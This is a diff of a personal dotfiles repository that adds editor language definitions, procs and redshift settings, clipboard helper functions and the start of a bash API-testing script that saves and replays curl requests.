|
||||||
|
language-servers = [ "solc" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "solidity"
|
||||||
|
source = { git = "https://github.com/JoranHonig/tree-sitter-solidity", rev = "f7f5251a3f5b1d04f0799b3571b12918af177fc8" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "sql"
|
||||||
|
scope = "source.sql"
|
||||||
|
file-types = ["sql", "dsql"]
|
||||||
|
comment-token = "--"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
injection-regex = "sql"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "sql"
|
||||||
|
source = { git = "https://github.com/DerekStride/tree-sitter-sql", rev = "b9d109588d5b5ed986c857464830c2f0bef53f18" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "odin"
|
||||||
|
auto-format = true
|
||||||
|
scope = "source.odin"
|
||||||
|
file-types = ["odin"]
|
||||||
|
roots = ["ols.json", "main.odin"]
|
||||||
|
language-servers = [ "ols" ]
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
formatter = { command = "odinfmt", args = [ "-stdin" ] }
|
||||||
|
|
||||||
|
[language.debugger]
|
||||||
|
name = "lldb-dap"
|
||||||
|
transport = "stdio"
|
||||||
|
command = "lldb-dap"
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "binary"
|
||||||
|
request = "launch"
|
||||||
|
completion = [ { name = "binary", completion = "filename" } ]
|
||||||
|
args = { console = "internalConsole", program = "{0}" }
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "attach"
|
||||||
|
request = "attach"
|
||||||
|
completion = [ "pid" ]
|
||||||
|
args = { console = "internalConsole", pid = "{0}" }
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "gdbserver attach"
|
||||||
|
request = "attach"
|
||||||
|
completion = [ { name = "lldb connect url", default = "connect://localhost:3333" }, { name = "file", completion = "filename" }, "pid" ]
|
||||||
|
args = { console = "internalConsole", attachCommands = [ "platform select remote-gdb-server", "platform connect {0}", "file {1}", "attach {2}" ] }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "odin"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-odin", rev = "b5f668ef8918aab13812ce73acd89fe191fb8c5e" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "sshclientconfig"
|
||||||
|
scope = "source.sshclientconfig"
|
||||||
|
file-types = [{ glob = ".ssh/config" }, { glob = "/etc/ssh/ssh_config" }, { glob = "ssh_config.d/*.conf" } ]
|
||||||
|
comment-token = "#"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "sshclientconfig"
|
||||||
|
source = { git = "https://github.com/metio/tree-sitter-ssh-client-config", rev = "e45c6d5c71657344d4ecaf87dafae7736f776c57" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "elvish"
|
||||||
|
scope = "source.elvish"
|
||||||
|
shebangs = ["elvish"]
|
||||||
|
file-types = ["elv"]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = [ "elvish" ]
|
||||||
|
grammar = "elvish"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "elvish"
|
||||||
|
source = { git = "https://github.com/ckafi/tree-sitter-elvish", rev = "e50787cadd3bc54f6d9c0704493a79078bb8a4e5" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "xml"
|
||||||
|
scope = "source.xml"
|
||||||
|
injection-regex = "xml"
|
||||||
|
file-types = [
|
||||||
|
"xml",
|
||||||
|
"mobileconfig",
|
||||||
|
"plist",
|
||||||
|
"xib",
|
||||||
|
"storyboard",
|
||||||
|
"svg",
|
||||||
|
"xsd",
|
||||||
|
"gml",
|
||||||
|
"xaml",
|
||||||
|
"gir",
|
||||||
|
"rss",
|
||||||
|
"atom",
|
||||||
|
"opml",
|
||||||
|
"policy",
|
||||||
|
"ascx",
|
||||||
|
"axml",
|
||||||
|
"axaml",
|
||||||
|
"bpmn",
|
||||||
|
"cpt",
|
||||||
|
"csl",
|
||||||
|
"csproj.user",
|
||||||
|
"dita",
|
||||||
|
"ditamap",
|
||||||
|
"dtml",
|
||||||
|
"fxml",
|
||||||
|
"iml",
|
||||||
|
"isml",
|
||||||
|
"jmx",
|
||||||
|
"launch",
|
||||||
|
"menu",
|
||||||
|
"mxml",
|
||||||
|
"nuspec",
|
||||||
|
"osc",
|
||||||
|
"osm",
|
||||||
|
"pt",
|
||||||
|
"publishsettings",
|
||||||
|
"pubxml",
|
||||||
|
"pubxml.user",
|
||||||
|
"rbxlx",
|
||||||
|
"rbxmx",
|
||||||
|
"rng",
|
||||||
|
"shproj",
|
||||||
|
"tld",
|
||||||
|
{ glob = "*.tm[Tt]heme" },
|
||||||
|
"tmx",
|
||||||
|
"vbproj.user",
|
||||||
|
"vcxproj",
|
||||||
|
"vcxproj.filters",
|
||||||
|
"wsdl",
|
||||||
|
"wxi",
|
||||||
|
"wxs",
|
||||||
|
"xbl",
|
||||||
|
"xlf",
|
||||||
|
"xliff",
|
||||||
|
"xpdl",
|
||||||
|
"xul",
|
||||||
|
"xoml",
|
||||||
|
"musicxml",
|
||||||
|
"glif",
|
||||||
|
"ui",
|
||||||
|
"sublime-snippet",
|
||||||
|
"xsl",
|
||||||
|
"mpd",
|
||||||
|
"smil"
|
||||||
|
]
|
||||||
|
block-comment-tokens = { start = "<!--", end = "-->" }
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[language.auto-pairs]
|
||||||
|
'(' = ')'
|
||||||
|
'{' = '}'
|
||||||
|
'[' = ']'
|
||||||
|
'"' = '"'
|
||||||
|
"'" = "'"
|
||||||
|
"<" = ">"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "xml"
|
||||||
|
source = { git = "https://github.com/RenjiSann/tree-sitter-xml", rev = "48a7c2b6fb9d515577e115e6788937e837815651" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "env"
|
||||||
|
scope = "source.env"
|
||||||
|
file-types = [{ glob = ".env" }, { glob = ".env.*" }, { glob = ".envrc" }, { glob = ".envrc.*" }]
|
||||||
|
injection-regex = "env"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
grammar = "bash"
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "ini"
|
||||||
|
scope = "source.ini"
|
||||||
|
file-types = [
|
||||||
|
"ini",
|
||||||
|
# Systemd unit files
|
||||||
|
"service",
|
||||||
|
"automount",
|
||||||
|
"desktop",
|
||||||
|
"device",
|
||||||
|
"mount",
|
||||||
|
"nspawn",
|
||||||
|
"path",
|
||||||
|
"scope",
|
||||||
|
"slice",
|
||||||
|
"socket",
|
||||||
|
"swap",
|
||||||
|
"target",
|
||||||
|
"timer",
|
||||||
|
{ glob = "systemd/**/*.conf" },
|
||||||
|
# Podman quadlets
|
||||||
|
"container",
|
||||||
|
"volume",
|
||||||
|
"kube",
|
||||||
|
"network",
|
||||||
|
{ glob = ".editorconfig" },
|
||||||
|
{ glob = ".npmrc" },
|
||||||
|
{ glob = "hgrc" },
|
||||||
|
{ glob = "npmrc" },
|
||||||
|
{ glob = "rclone.conf" },
|
||||||
|
"properties",
|
||||||
|
"cfg",
|
||||||
|
"directory"
|
||||||
|
]
|
||||||
|
injection-regex = "ini"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "ini"
|
||||||
|
source = { git = "https://github.com/justinmk/tree-sitter-ini", rev = "32b31863f222bf22eb43b07d4e9be8017e36fb31" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "mermaid"
|
||||||
|
scope = "source.mermaid"
|
||||||
|
injection-regex = "mermaid"
|
||||||
|
file-types = ["mermaid", "mmd"]
|
||||||
|
comment-token = "%%"
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "mermaid"
|
||||||
|
source = { git = "https://github.com/monaqa/tree-sitter-mermaid", rev = "d787c66276e7e95899230539f556e8b83ee16f6d" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "markdoc"
|
||||||
|
scope = "text.markdoc"
|
||||||
|
block-comment-tokens = { start = "<!--", end = "-->" }
|
||||||
|
file-types = ["mdoc"]
|
||||||
|
language-servers = [ "markdoc-ls" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "markdoc"
|
||||||
|
source = { git = "https://github.com/markdoc-extra/tree-sitter-markdoc", rev = "5ffe71b29e8a3f94823913ea9cea51fcfa7e3bf8" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "log"
|
||||||
|
scope = "source.log"
|
||||||
|
file-types = ["log"]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "log"
|
||||||
|
source = { git = "https://github.com/Tudyx/tree-sitter-log", rev = "62cfe307e942af3417171243b599cc7deac5eab9" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "powershell"
|
||||||
|
scope = "source.powershell"
|
||||||
|
injection-regex = "(pwsh|powershell)"
|
||||||
|
file-types = [ "ps1", "psm1", "psd1", "pscc", "psrc" ]
|
||||||
|
shebangs = [ "pwsh", "powershell" ]
|
||||||
|
comment-token = '#'
|
||||||
|
block-comment-tokens = { start = "<#", end = "#>" }
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "powershell"
|
||||||
|
source = { git = "https://github.com/airbus-cert/tree-sitter-powershell", rev = "c9316be0faca5d5b9fd3b57350de650755f42dc0" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "nginx"
|
||||||
|
scope = "source.nginx"
|
||||||
|
injection-regex = "nginx"
|
||||||
|
file-types = [
|
||||||
|
{ glob = "sites-available/*.conf" },
|
||||||
|
{ glob = "sites-enabled/*.conf" },
|
||||||
|
{ glob = "nginx.conf" },
|
||||||
|
{ glob = "conf.d/*.conf" }
|
||||||
|
]
|
||||||
|
roots = ["nginx.conf"]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "nginx"
|
||||||
|
source = { git = "https://gitlab.com/joncoole/tree-sitter-nginx", rev = "b4b61db443602b69410ab469c122c01b1e685aa0" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "ghostty"
|
||||||
|
scope = "source.ghostty"
|
||||||
|
file-types = [{ glob = "ghostty/config" }]
|
||||||
|
comment-tokens = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "ghostty"
|
||||||
|
source = { git = "https://github.com/bezhermoso/tree-sitter-ghostty" , rev = "8438a93b44367e962b2ea3a3b6511885bebd196a" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "csv"
|
||||||
|
file-types = ["csv"]
|
||||||
|
scope = "source.csv"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "csv"
|
||||||
|
source = { git = "https://github.com/weartist/rainbow-csv-tree-sitter", rev = "d3dbf916446131417e4c2ea9eb8591b23b466d27" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "yara"
|
||||||
|
scope = "source.yara"
|
||||||
|
file-types = ["yara", "yar"]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
comment-tokens = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/"}
|
||||||
|
language-servers = [ "yls" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "yara"
|
||||||
|
source = { git = "https://github.com/egibs/tree-sitter-yara", rev = "eb3ede203275c38000177f72ec0f9965312806ef" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "debian"
|
||||||
|
scope = "text.debian"
|
||||||
|
file-types = [
|
||||||
|
"dsc",
|
||||||
|
"changes",
|
||||||
|
{ glob = "debian/**/control" },
|
||||||
|
{ glob = "etc/apt/sources.list.d/*.sources"}
|
||||||
|
]
|
||||||
|
comment-tokens = "#"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "debian"
|
||||||
|
source = { git = "https://gitlab.com/MggMuggins/tree-sitter-debian", rev = "9b3f4b78c45aab8a2f25a5f9e7bbc00995bc3dde" }
|
||||||
|
|
||||||
|
|
@ -548,7 +548,7 @@
|
||||||
|
|
||||||
###################[ command_execution_time: duration of the last command ]###################
|
###################[ command_execution_time: duration of the last command ]###################
|
||||||
# Show duration of the last command if takes at least this many seconds.
|
# Show duration of the last command if takes at least this many seconds.
|
||||||
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_THRESHOLD=3
|
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_THRESHOLD=1
|
||||||
# Show this many fractional digits. Zero means round to seconds.
|
# Show this many fractional digits. Zero means round to seconds.
|
||||||
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PRECISION=0
|
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PRECISION=0
|
||||||
# Execution time color.
|
# Execution time color.
|
||||||
|
|
|
||||||
140
procs/.config/procs/config.toml
Normal file
140
procs/.config/procs/config.toml
Normal file
|
|
@ -0,0 +1,140 @@
|
||||||
|
[[columns]]
|
||||||
|
kind = "Pid"
|
||||||
|
style = "BrightYellow|Yellow"
|
||||||
|
numeric_search = true
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "User"
|
||||||
|
style = "BrightGreen|Green"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = true
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "Separator"
|
||||||
|
style = "White|BrightBlack"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "Tty"
|
||||||
|
style = "BrightWhite|Black"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "UsageCpu"
|
||||||
|
style = "ByPercentage"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Right"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "UsageMem"
|
||||||
|
style = "ByPercentage"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Right"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "CpuTime"
|
||||||
|
style = "BrightCyan|Cyan"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "MultiSlot"
|
||||||
|
style = "ByUnit"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Right"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "Separator"
|
||||||
|
style = "White|BrightBlack"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "Command"
|
||||||
|
style = "BrightWhite|Black"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = true
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[style]
|
||||||
|
header = "BrightWhite|Black"
|
||||||
|
unit = "BrightWhite|Black"
|
||||||
|
tree = "BrightWhite|Black"
|
||||||
|
|
||||||
|
[style.by_percentage]
|
||||||
|
color_000 = "BrightBlue|Blue"
|
||||||
|
color_025 = "BrightGreen|Green"
|
||||||
|
color_050 = "BrightYellow|Yellow"
|
||||||
|
color_075 = "BrightRed|Red"
|
||||||
|
color_100 = "BrightRed|Red"
|
||||||
|
|
||||||
|
[style.by_state]
|
||||||
|
color_d = "BrightRed|Red"
|
||||||
|
color_r = "BrightGreen|Green"
|
||||||
|
color_s = "BrightBlue|Blue"
|
||||||
|
color_t = "BrightCyan|Cyan"
|
||||||
|
color_z = "BrightMagenta|Magenta"
|
||||||
|
color_x = "BrightMagenta|Magenta"
|
||||||
|
color_k = "BrightYellow|Yellow"
|
||||||
|
color_w = "BrightYellow|Yellow"
|
||||||
|
color_p = "BrightYellow|Yellow"
|
||||||
|
|
||||||
|
[style.by_unit]
|
||||||
|
color_k = "BrightBlue|Blue"
|
||||||
|
color_m = "BrightGreen|Green"
|
||||||
|
color_g = "BrightYellow|Yellow"
|
||||||
|
color_t = "BrightRed|Red"
|
||||||
|
color_p = "BrightRed|Red"
|
||||||
|
color_x = "BrightBlue|Blue"
|
||||||
|
|
||||||
|
[search]
|
||||||
|
numeric_search = "Exact"
|
||||||
|
nonnumeric_search = "Partial"
|
||||||
|
logic = "And"
|
||||||
|
case = "Smart"
|
||||||
|
|
||||||
|
[display]
|
||||||
|
show_self = false
|
||||||
|
show_self_parents = false
|
||||||
|
show_thread = false
|
||||||
|
show_thread_in_tree = true
|
||||||
|
show_parent_in_tree = true
|
||||||
|
show_children_in_tree = true
|
||||||
|
show_header = true
|
||||||
|
show_footer = false
|
||||||
|
cut_to_terminal = true
|
||||||
|
cut_to_pager = false
|
||||||
|
cut_to_pipe = false
|
||||||
|
color_mode = "Auto"
|
||||||
|
separator = "│"
|
||||||
|
ascending = "▲"
|
||||||
|
descending = "▼"
|
||||||
|
tree_symbols = ["│", "─", "┬", "├", "└"]
|
||||||
|
abbr_sid = true
|
||||||
|
theme = "Auto"
|
||||||
|
show_kthreads = true
|
||||||
|
|
||||||
|
[sort]
|
||||||
|
column = 0
|
||||||
|
order = "Ascending"
|
||||||
|
|
||||||
|
[docker]
|
||||||
|
path = "unix:///var/run/docker.sock"
|
||||||
|
|
||||||
|
[pager]
|
||||||
|
mode = "Auto"
|
||||||
|
detect_width = false
|
||||||
|
use_builtin = false
|
||||||
|
|
||||||
73
redshift/.config/redshift.conf
Normal file
73
redshift/.config/redshift.conf
Normal file
|
|
@ -0,0 +1,73 @@
|
||||||
|
; Global settings for redshift
|
||||||
|
[redshift]
|
||||||
|
; Set the day and night screen temperatures
|
||||||
|
temp-day=5700
|
||||||
|
temp-night=3200
|
||||||
|
|
||||||
|
; Disable the smooth fade between temperatures when Redshift starts and stops.
|
||||||
|
; 0 will cause an immediate change between screen temperatures.
|
||||||
|
; 1 will gradually apply the new screen temperature over a couple of seconds.
|
||||||
|
fade=1
|
||||||
|
|
||||||
|
; Solar elevation thresholds.
|
||||||
|
; By default, Redshift will use the current elevation of the sun to determine
|
||||||
|
; whether it is daytime, night or in transition (dawn/dusk). When the sun is
|
||||||
|
; above the degrees specified with elevation-high it is considered daytime and
|
||||||
|
; below elevation-low it is considered night.
|
||||||
|
;elevation-high=3
|
||||||
|
;elevation-low=-6
|
||||||
|
|
||||||
|
; Custom dawn/dusk intervals.
|
||||||
|
; Instead of using the solar elevation, the time intervals of dawn and dusk
|
||||||
|
; can be specified manually. The times must be specified as HH:MM in 24-hour
|
||||||
|
; format.
|
||||||
|
;dawn-time=6:00-7:45
|
||||||
|
;dusk-time=18:35-20:15
|
||||||
|
|
||||||
|
; Set the screen brightness. Default is 1.0.
|
||||||
|
;brightness=0.9
|
||||||
|
; It is also possible to use different settings for day and night
|
||||||
|
; since version 1.8.
|
||||||
|
;brightness-day=0.7
|
||||||
|
;brightness-night=0.4
|
||||||
|
; Set the screen gamma (for all colors, or each color channel
|
||||||
|
; individually)
|
||||||
|
gamma=0.8
|
||||||
|
;gamma=0.8:0.7:0.8
|
||||||
|
; This can also be set individually for day and night since
|
||||||
|
; version 1.10.
|
||||||
|
;gamma-day=0.8:0.7:0.8
|
||||||
|
;gamma-night=0.6
|
||||||
|
|
||||||
|
; Set the location-provider: 'geoclue2', 'manual'
|
||||||
|
; type 'redshift -l list' to see possible values.
|
||||||
|
; The location provider settings are in a different section.
|
||||||
|
location-provider=manual
|
||||||
|
|
||||||
|
; Set the adjustment-method: 'randr', 'vidmode'
|
||||||
|
; type 'redshift -m list' to see all possible values.
|
||||||
|
; 'randr' is the preferred method, 'vidmode' is an older API.
|
||||||
|
; but works in some cases when 'randr' does not.
|
||||||
|
; The adjustment method settings are in a different section.
|
||||||
|
# adjustment-method=randr
|
||||||
|
adjustment-method=vidmode
|
||||||
|
|
||||||
|
; Configuration of the location-provider:
|
||||||
|
; type 'redshift -l PROVIDER:help' to see the settings.
|
||||||
|
; ex: 'redshift -l manual:help'
|
||||||
|
; Keep in mind that longitudes west of Greenwich (e.g. the Americas)
|
||||||
|
; are negative numbers.
|
||||||
|
[manual]
|
||||||
|
lat=39.742043
|
||||||
|
lon=-104.991531
|
||||||
|
# lat=48.1
|
||||||
|
# lon=11.6
|
||||||
|
|
||||||
|
; Configuration of the adjustment-method
|
||||||
|
; type 'redshift -m METHOD:help' to see the settings.
|
||||||
|
; ex: 'redshift -m randr:help'
|
||||||
|
; In this example, randr is configured to adjust only screen 0.
|
||||||
|
; Note that the numbering starts from 0, so this is actually the first screen.
|
||||||
|
; If this option is not specified, Redshift will try to adjust _all_ screens.
|
||||||
|
[randr]
|
||||||
|
screen=0
|
||||||
31
scripts/.clipboard-helper
Normal file
31
scripts/.clipboard-helper
Normal file
|
|
@ -0,0 +1,31 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# Clipboard helper functions for scripts
|
||||||
|
# Source this in scripts that need clipboard access
|
||||||
|
|
||||||
|
# Get clipboard content
|
||||||
|
clip_get() {
|
||||||
|
if command -v xsel &>/dev/null; then
|
||||||
|
xsel --output --clipboard
|
||||||
|
elif command -v xclip &>/dev/null; then
|
||||||
|
xclip -selection clipboard -o
|
||||||
|
elif command -v pbpaste &>/dev/null; then
|
||||||
|
pbpaste
|
||||||
|
else
|
||||||
|
echo "Error: No clipboard tool found (install xsel or xclip)" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Set clipboard content
|
||||||
|
clip_set() {
|
||||||
|
if command -v xsel &>/dev/null; then
|
||||||
|
xsel --input --clipboard
|
||||||
|
elif command -v xclip &>/dev/null; then
|
||||||
|
xclip -selection clipboard
|
||||||
|
elif command -v pbcopy &>/dev/null; then
|
||||||
|
pbcopy
|
||||||
|
else
|
||||||
|
echo "Error: No clipboard tool found (install xsel or xclip)" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
443
scripts/api
Executable file
443
scripts/api
Executable file
|
|
@ -0,0 +1,443 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: api
|
||||||
|
# Description: API testing helper with saved requests and response management
|
||||||
|
# Usage: api save login "POST https://api.com/login" -d '{"user":"test"}'
|
||||||
|
# api run login
|
||||||
|
# api list
|
||||||
|
# api history login
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
API_DIR="$HOME/.api"
|
||||||
|
REQUESTS_DIR="$API_DIR/requests"
|
||||||
|
RESPONSES_DIR="$API_DIR/responses"
|
||||||
|
TOKENS_FILE="$API_DIR/tokens.json"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Initialize API directory structure
|
||||||
|
init_api() {
|
||||||
|
mkdir -p "$REQUESTS_DIR" "$RESPONSES_DIR"
|
||||||
|
if [[ ! -f "$TOKENS_FILE" ]]; then
|
||||||
|
echo '{}' > "$TOKENS_FILE"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}api${NC} - API Testing Helper v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " api <command> [args]"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}COMMANDS:${NC}"
|
||||||
|
echo -e " ${CYAN}save NAME CURL_ARGS${NC} Save HTTP request"
|
||||||
|
echo -e " ${CYAN}run NAME [VARS]${NC} Run saved request"
|
||||||
|
echo -e " ${CYAN}list${NC} List saved requests"
|
||||||
|
echo -e " ${CYAN}show NAME${NC} Show request details"
|
||||||
|
echo -e " ${CYAN}delete NAME${NC} Delete saved request"
|
||||||
|
echo -e " ${CYAN}history NAME${NC} Show response history"
|
||||||
|
echo -e " ${CYAN}diff NAME${NC} Diff last two responses"
|
||||||
|
echo -e " ${CYAN}token set KEY VAL${NC} Save auth token"
|
||||||
|
echo -e " ${CYAN}token get KEY${NC} Get auth token"
|
||||||
|
echo -e " ${CYAN}export NAME curl${NC} Export as curl command"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " # Save a login request"
|
||||||
|
echo " api save login \"POST https://api.example.com/login\" \\"
|
||||||
|
echo " -H \"Content-Type: application/json\" \\"
|
||||||
|
echo " -d '{\"user\":\"test\",\"pass\":\"\${PASSWORD}\"}'"
|
||||||
|
echo
|
||||||
|
echo " # Run with variable substitution"
|
||||||
|
echo " api run login PASSWORD=secret123"
|
||||||
|
echo
|
||||||
|
echo " # Save auth token from response"
|
||||||
|
echo " api token set AUTH_TOKEN \"Bearer abc123\""
|
||||||
|
echo
|
||||||
|
echo " # Use token in request"
|
||||||
|
echo " api save profile \"GET https://api.example.com/profile\" \\"
|
||||||
|
echo " -H \"Authorization: \${AUTH_TOKEN}\""
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}FEATURES:${NC}"
|
||||||
|
echo " - Variable substitution (\${VAR})"
|
||||||
|
echo " - Response history"
|
||||||
|
echo " - Pretty-print JSON"
|
||||||
|
echo " - Diff responses"
|
||||||
|
echo " - Token management"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}NOTES:${NC}"
|
||||||
|
echo " Requests: $REQUESTS_DIR"
|
||||||
|
echo " Responses: $RESPONSES_DIR"
|
||||||
|
echo " Tokens: $TOKENS_FILE"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Save request
|
||||||
|
save_request() {
|
||||||
|
local name=$1
|
||||||
|
shift
|
||||||
|
local request_file="$REQUESTS_DIR/$name.sh"
|
||||||
|
|
||||||
|
# Save the curl command
|
||||||
|
cat > "$request_file" << EOF
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# API Request: $name
|
||||||
|
# Saved: $(date)
|
||||||
|
|
||||||
|
curl -w "\\n\\nStatus: %{http_code}\\nTime: %{time_total}s\\n" \\
|
||||||
|
$@
|
||||||
|
EOF
|
||||||
|
|
||||||
|
chmod +x "$request_file"
|
||||||
|
echo -e "${GREEN}✓${NC} Saved request: $name"
|
||||||
|
echo -e "${CYAN}File:${NC} $request_file"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Run saved request
|
||||||
|
run_request() {
|
||||||
|
local name=$1
|
||||||
|
shift
|
||||||
|
local request_file="$REQUESTS_DIR/$name.sh"
|
||||||
|
|
||||||
|
if [[ ! -f "$request_file" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Request not found: $name" >&2
|
||||||
|
echo "Use 'api list' to see available requests" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Parse variables (KEY=VALUE format)
|
||||||
|
declare -A vars
|
||||||
|
for arg in "$@"; do
|
||||||
|
if [[ "$arg" =~ ^([A-Z_]+)=(.+)$ ]]; then
|
||||||
|
vars[${BASH_REMATCH[1]}]="${BASH_REMATCH[2]}"
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
# Read request, substitute variables
|
||||||
|
request_content=$(cat "$request_file")
|
||||||
|
for var in "${!vars[@]}"; do
|
||||||
|
request_content="${request_content//\$\{$var\}/${vars[$var]}}"
|
||||||
|
done
|
||||||
|
|
||||||
|
# Also substitute from tokens file
|
||||||
|
if command -v jq &>/dev/null && [[ -f "$TOKENS_FILE" ]]; then
|
||||||
|
while IFS= read -r line; do
|
||||||
|
key=$(echo "$line" | jq -r '.key')
|
||||||
|
val=$(echo "$line" | jq -r '.value')
|
||||||
|
request_content="${request_content//\$\{$key\}/$val}"
|
||||||
|
done < <(jq -c 'to_entries[]' "$TOKENS_FILE")
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Save response with timestamp
|
||||||
|
timestamp=$(date '+%Y%m%d-%H%M%S')
|
||||||
|
response_file="$RESPONSES_DIR/${name}_${timestamp}.txt"
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Running: $name${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
# Execute and save response
|
||||||
|
echo "$request_content" | bash | tee "$response_file"
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✓${NC} Response saved: $response_file"
|
||||||
|
|
||||||
|
# Pretty-print JSON if possible
|
||||||
|
if command -v jq &>/dev/null; then
|
